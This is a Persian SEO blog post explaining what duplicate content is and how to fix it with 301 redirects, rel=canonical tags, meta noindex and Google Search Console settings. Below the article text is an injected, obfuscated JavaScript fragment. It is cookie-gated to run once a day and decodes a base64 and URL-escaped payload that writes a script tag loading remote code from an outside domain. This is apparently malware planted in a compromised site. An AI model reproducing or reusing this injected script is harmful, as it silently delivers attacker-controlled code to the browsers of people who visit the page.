بدون دیدگاه
2021/02/24
342 بازدید

محتوای تکراری (duplicate content) چیست؟ و چگونه می توان از آن اجتناب کرد؟

یکی از مشکلاتی که بسیاری از کارشناسان سئو و وبمستران با آن روبرو هستند، می توان به داشتن محتوای تکراری  (duplicate content) اشاره کرد. البته اگر سایت شما فروشگاهی باشد، قطعا با محتوای تکراری روبرو خواهید بود و برای آنکه مشکلی در سئو سایت شما بوجود نیاید، باید از روش هایی برای فهم بهتر گوگل و افزایش رتبه در موتورهای جستجو استفاده نمایید. ویکی دمی در این مقاله قرار است درباره تاثیر محتواهای تکراری بر روی سئو سایت شما صحبت کند و به شما راهکارهایی را برای بهتر کردن سایت و محتوای شما آموزش دهد،  پس با ما همراه باشید.

اگر علاقه مند هستید که به صورت خلاصه اطلاعاتی درمورد محتوای تکراری کسب کنید، در ابتدا به پادکست زیر گوش دهید.

 

محتوای تکراری چیست؟

محتوای تکراری،  محتوایی است که در اینترنت در بیش از یک مکان ظاهر می شود. این “یک مکان” به عنوان مکانی با آدرس وب سایت منحصر به فرد (URL) تعریف می شود؛ بنابراین ، اگر همان محتوا در بیش از یک آدرس وب ظاهر شود، duplicate content دریافت شده است.

اگرچه از نظر فنی مجازات نیست، اما محتوای تکراری هنوز هم گاهی اوقات می تواند بر رتبه بندی موتور جستجو تأثیر داشته باشد.  هنگامی که چندین قطعه از محتوا “به طور قابل ملاحظه ای مشابه” در بیش از یک مکان در اینترنت وجود دارند ، برای موتورهای جستجو دشوار است که تصمیم بگیرند، کدام نسخه بیشتر مربوط به یک جستجوی خاص است.

محتواهای تکراری یا در داخل یک سایت ایجاد می شوند که این عمل به خاطر طراحی سایت اشتباه یا گول زدن گوگل، ایجاد شده است که نتیجه آن پنالتی از سمت الگوریتم پنگوئن خواهد بود. یا اینکه با دو آدرس متفاوت، به طراحی سایت مشابه و محتوای تکراری پرداخته شده است که این کار، بین کسب و کارها برای دریافت رتبه بهتر بسیار رایج شده است.

چرا محتواهای تکراری بسیار مهم هستند؟

این نوع محتواها می توانند  برای موتورهای جستجو، دارای سه مسئله مهم باشند:

  1. آنها نمی دانند کدام نسخه (های) را از شاخص های خود وارد کنند / حذف کنند.
  2. آنها نمی دانند معیارهای مهم لینک (اعتماد ، اقتدار، انکر تکست، کیفیت لینک و غیره) را به یک صفحه  انتقال دهند یا آن را بین نسخه های مختلف، تقسیم نمایند.
  3. آنها نمی دانند کدام نسخه (ها) را برای نتایج جستجو رتبه بندی کنند.

مطالب ذکر شده، مشکلاتی بودند که ممکن است برای موتورهای جستجو به وجود آید، اما اگر شما جز دارندگان چنین سایتی باشید، قطعا با مشکلاتی روبرو خواهید شد که در ادامه به آن ها پرداخته می شود:

وقتی محتوای تکراری وجود دارد، دارندگان سایت می توانند شاهد از دست دادن رتبه و کاهش بازدیدکننده نیز باشند. این خسارات اغلب از دو مشکل اصلی ناشی می شود:

  • برای اینکه موتورهای جستجو بهترین تجربه و نتیجه را به کاربران نشان دهند، به ندرت پیش می آید که نسخه های مختلفی از یک سایت را نشان دهند و عموما نسخه ای را نمایش می دهند که دارای کیفیت بهتری است و همین امر باعث کاهش دید هر یک از نسخه های تکراری می شود.
  • ارزش پیوند را می توان بیشتر رقیق کرد زیرا سایت های دیگر نیز باید از بین نسخه های تکراری، یکی را انتخاب کنند. بجای اینکه همه لینک های ورودی، به یک قسمت از محتوا اشاره کنند ، آنها به چندین قسمت لینک داده می شوند، و ارزش پیوند را در بین نسخه های مختلف گسترش می دهند. از آنجا که پیوندهای ورودی یک عامل رتبه بندی است، بنابراین می تواند بر قابلیت جستجو در یک محتوا تأثیر بگذارد.
  بهینه سازی بودجه خزش (crawl budget)، با روش های طلایی | تاثیر کرال باجت بر سئو

چطور مشکل duplicate content اتفاق می افتد؟

در اکثر قریب به اتفاق، دارندگان وب سایت عمداً محتوای تکراری ایجاد نمی کنند. اما، این بدان معنی نیست که در سایت آنها چنین محتواهایی وجود نداشته باشد. در واقع، طبق برخی تخمین ها، تا 29 درصد از سایت ها در وب، دارای محتوای کپی و تکراری هستند.

https://wikidemy.ir/on-page-seo/

بیایید نگاهی به برخی از متداول ترین روش های ایجاد ناخواسته محتوای تکراری بیندازیم:

1. تغییرات URL

پارامترهای URL ، مانند ردیابی کلیک و برخی از کد های تجزیه و تحلیل، می توانند مشکلات محتوای تکراری ایجاد کنند. این می تواند مشکلی باشد که نه تنها توسط خود پارامترها، بلکه به ترتیب نمایش آن پارامترها در خود URL نیز ایجاد شود.

برای مثال:

www.widgets.com/blue-widgets?c… این آدرس تکراری از  www.widgets.com/blue-widgets?c…&cat=3″است. class=”redactor-autoparser-object”>www.widgets.com/blue-widgets تکراری از است www.widgets.com/blue-widgets?cat=3&color=blue

به همین ترتیب، session ID هم می تواند به عنوان یک محتوای تکراری در نظر گرفته شود که بسیار هم رایج است. این اتفاق زمانی می افتد که به هر کاربری که از یک وب سایت بازدید می کند شناسه جلسه دیگری اختصاص داده شود که در URL ذخیره شده باشد.

نسخه های قابل چاپ برای محتوا، همچنین می توانند با تکرار شدن چندین نسخه از صفحه ، مشکلات محتوای تکراری ایجاد کنند.

یک درسی که در اینجا داده شده است این است که در صورت امکان، از افزودن پارامترهای URL یا نسخه های جایگزین URL ها پرهیز نمایید.

2.صفحات HTTP در مقابل HTTPS یا WWW در مقابل غیر WWW

اگر سایت شما نسخه های جداگانه ای در “www.site.com” و “site.com” دارد (با و بدون پیشوند “www”) و محتوای یکسانی در هر دو نسخه ساخته شده است، شما به طور خودکار، نسخه های تکراری از هر یک از آنها را ایجاد کرده اید و صفحات با چنین محتواهای تکراری، برای سایت هایی که نسخه های خود را در هر دو آدرس http: // و https: // نگهداری می کنند نیز،اعمال می شود. اگر هر دو نسخه از یک صفحه زنده هستند و برای موتورهای جستجو قابل مشاهده هستند ، ممکن است با یک مشکل محتوای تکراری روبرو شوند.

3. محتوای خراشیده یا کپی شده

محتوا نه تنها شامل پست های وبلاگ یا محتوای سرمقاله است، بلکه صفحات اطلاعات محصول نیز می باشد. اسکرابرها که بازنشر مطالب وبلاگ شما را در سایت های خود منتشر می کنند ممکن است منبع آشناتر محتوای تکراری باشد، اما یک مشکل مشترک برای سایت های تجارت الکترونیکی نیز وجود دارد: اطلاعات مربوط به محصولات. اگر بسیاری از وب سایت های مختلف موارد مشابهی را بفروشند و همه آنها از توضیحات سازنده در مورد آن موارد استفاده کنند، محتوای یکسان در چندین مکان در سراسر وب پخش می شود.

  منظور از کلوکینگ در سئو چیست و انواع CLOAKING کدام است؟

چگونه مشکلات محتوای تکراری را برطرف کنیم

رفع مشکلات محتوای تکراری، همه به همان ایده اصلی برمی گردد: مشخص کردن اینکه کدام یک از نسخه های تکراری “صحیح” است.

هر زمان که محتوای یک سایت در چندین URL یافت شود ، باید برای موتورهای جستجو قانونی شود. بیایید سه روش اصلی برای انجام این کار را مرور کنیم: استفاده از هدایت 301 به URL صحیح ، ویژگی rel = canonical یا استفاده از ابزار کنترل پارامتر در Google Search Console.

ریدایرکت 301

در بسیاری از موارد ، بهترین راه برای مبارزه با محتوای تکراری ، استفاده از ریدایرکت 301 از صفحه “تکرار” به صفحه محتوای اصلی است.

وقتی چندین صفحه با قابلیت رتبه بندی خوب در یک صفحه واحد ترکیب شوند، نه تنها از رقابت با یکدیگر باز می مانند. بلکه، آنها  به طور کلی ارتباط و محبوبیت قوی تری ایجاد می کنند. این بار، توانایی صفحه “صحیح” برای رتبه بندی مثبت، تاثیر می گذارد.

Rel=Canonical

یکی دیگر از راههایی که می توان با duplicate content مقابله کرد، استفاده از ویژگی کنونیکال است. این ویژگی به گوگل اعلام می کند که این صفحه کپی از آدرس صفحه اصلی بوده وقدرت تمامی لینک ها و محتواهایی که در این صفحه بوده به صفحه اصلی انتقال داده می شود. rel=canonical، یک کد html بوده که برای راحتی کار مورد استفاده قرار می گیرد و نمونه آن به شرح زیر است:

<head>…[other code that might be in your document’s HTML head]…<link href=”URL OF ORIGINAL PAGE” rel=”canonical” />…[other code that might be in your document’s HTML head]…</head>

 

این ویژگی به head HTML برای جلوگیری از محتوای کپی ایجاد می شودو به گوگل می گوید که نسخه اصلی این صفحه کدام است؛ یادتان باشد که کنونیکال باید در کوتیشن مارک (“) قرار گیرد. این ویژگی مانند ریدایرکت 301، تمامی ارزش ها را انتقال می دهد و در یک سطح قرار دارند.

Meta Robots Noindex

یکی از برچسب های متا که در پرداختن به محتوای تکراری نیز می تواند مفید باشد، روبات های متا (meta robots) است که با مقادیر “noindex ، follow” استفاده می شود. این متا را که معمولاً  Meta Noindex، Follow می نامند  و از لحاظ فنی  به صورت content = “noindex، follow” نمایش داده می شود. این کد در head HTML  هر صفحه می تواند قرار گیرد و حتی به گوگل اعلام می کند که این صفحه را دنبال کند ولی در فهرست خود ذخیره ننماید.  این روش به گوگل اعلام می کند که صفحات تکراری و کپی را دنبال کند و اگر مشکلی هم در این صفحات وجود دارد، آن ها را اعلام کند اما در دیتابیس خود ذخیره نکند.

قالب کلی این کد به صورت زیر است:

<head>…[other code that might be in your document’s HTML head]…<meta name=”robots” content=”noindex,follow”>…[other code that might be in your document’s HTML head]…</head>

مدیریت دامنه و پارامترهای ترجیحی در سرچ کنسول گوگل

سرچ کنسول گوگل به شما این امکان را می دهد که دامنه مورد نظر سایت خود را تنظیم کنید (به عنوان مثال http://yoursite.com به جای http://www.yoursite.com) و تعیین کنید که آیا Googlebot باید پارامترهای مختلف URL را به طور متفاوت  مدیریت کند یا خیر.

بسته به ساختار URL شما و علت مشکلات محتوای تکراری ، با راه اندازی دامنه یا پارامتر مورد نظر خود (یا هر دو!) ممکن است راه حلی ارائه شود.

اشکال اصلی در استفاده از مدیریت پارامترها به عنوان روش اصلی، برای  برخورد با محتوای تکراری، این است تغییراتی  که ایجاد می کنید فقط برای Google کاربرد دارد. قوانینی که با استفاده از Google Search Console وضع شده اند ، تاثیری در نحوه تفسیر Bing یا سایر خزنده های موتور جستجو از سایت شما ندارند. علاوه بر تنظیم تنظیمات، در Search Console ، باید از ابزارهای مدیریت وب، برای سایر موتورهای جستجو استفاده کنید.

روش های اضافی برای مقابله با محتوای تکراری

در این بخش، نکات و روش هایی که باعث می شود با محتوای کپی، برخورد شود را برای شما بیان می کنیم:

1- در لینک های داخلی  وب سایت ، ثبات خود را حفظ کنید. به عنوان مثال ، اگر مدیر وب سایت تشخیص دهد که نسخه متعارف دامنه www.example.com/ است ، پس تمام پیوندهای داخلی باید به جای http://example.com به http: //www.example.co … / pa … (متوجه عدم وجود www شوید).

2- برای افزودن یک محافظ اضافی در برابر اسکرابرهای محتوا، که اعتبار SEO را از محتوای شما می دزدند ، عاقلانه است که یک پیوند خودکار مراجعه کننده = rel = canonical به صفحات موجود خود اضافه کنید. این یک ویژگی متعارف است که به URL موجود در آن نشان می دهد ، هدف این است که تلاش برخی از اسکرابرها را خنثی کند. اگرچه، همه اسکرابرها کد HTML کامل از منبع اصلی خود را حمل نمی کنند ، اما بعضی از آنها این کار را انجام می دهند. برای کسانی که این کار را انجام می دهند ، برچسب خود ارجاعی rel = canonical اطمینان می دهد که نسخه سایت شما به عنوان محتوای “اصلی” اعتبار می یابد.

لطفا نظرات خود را درباره این مقاله و راه هایی که می توان از محتوای تکراری و کپی جلوگیری به عمل آورد، در دیدگاه برای ما بگذارید. در صورت نیاز به مشاور سئو و راهنمایی در صفحات تکراری با شماره 09128909248 تماس حاصل نمایید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

دو + 18 =